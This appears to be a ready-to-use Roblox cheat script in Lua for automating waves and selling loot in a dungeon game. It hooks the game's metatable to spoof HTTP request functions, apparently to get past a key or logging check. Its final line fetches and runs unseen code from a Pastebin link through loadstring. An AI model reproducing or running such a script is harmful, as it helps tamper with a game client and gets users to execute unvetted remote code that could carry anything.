
local game = game
local format = getrawmetatable("").__index.format
local newcclosure = newcclosure or protect_function or function(...)
   return ...
end
local setreadonly = setreadonly or set_readonly or make_writeable
if pcall(coroutine.wrap, newcclosure) then
   warn("[WARNING]: YOUR EXPLOIT IS TRASH, JUST BUY SYNAPSE X NOOB!")
end
local Spoofs = {
   HttpGet = newcclosure(function()
       return format("print('%s')", game:GetService("HttpService"):GenerateGUID())
   end),
   HttpGetAsync = newcclosure(function()
       return format("print('%s')", game:GetService("HttpService"):GenerateGUID())
   end),
   HttpPost = newcclosure(function()
       return format("print('%s')", game:GetService("HttpService"):GenerateGUID())
   end),
   HttpPostAsync = newcclosure(function()
       return format("print('%s')", game:GetService("HttpService"):GenerateGUID())
   end)
}
local Meta = getrawmetatable(game)
local __index = Meta.__index
local new = function(self, index)
   if self == game and Spoofs[index] then
       return Spoofs[index]
   else
       return __index(self, index)
   end
end
setreadonly(Meta, false)
Meta.__index = newcclosure(new)
setreadonly(Meta, true)
_G.Key = "KEY"
_G._d = "Winter Outpost"
_G.__d = "Easy"
_G._maxwave = 99999 -- change to what wave you want it to end on
-- auto sell will sell everything not typed in _G.itemstokeep.  make sure to type the items name exactly like it says when you hover over it.
_G.autosell = false -- set to true if you want it to autosell
_G.itemstokeep = {"Dual Phoenix Daggers", "Phoenix Greatstaff", "Demon Lord's Greatstaff", "Glorious Mage Hood", "Glorious Mage Armor", "Glorious Warrior Helmet", "Glorious Warrior Armor", "Glorious Guardian Helmet", "Glorious Guardian Armor", "Battle Shout", "Chain Heal", "Skull Flames", "Ice Nova"}
loadstring(game:HttpGet("https://pastebin.com/raw/gRB6px1a"))()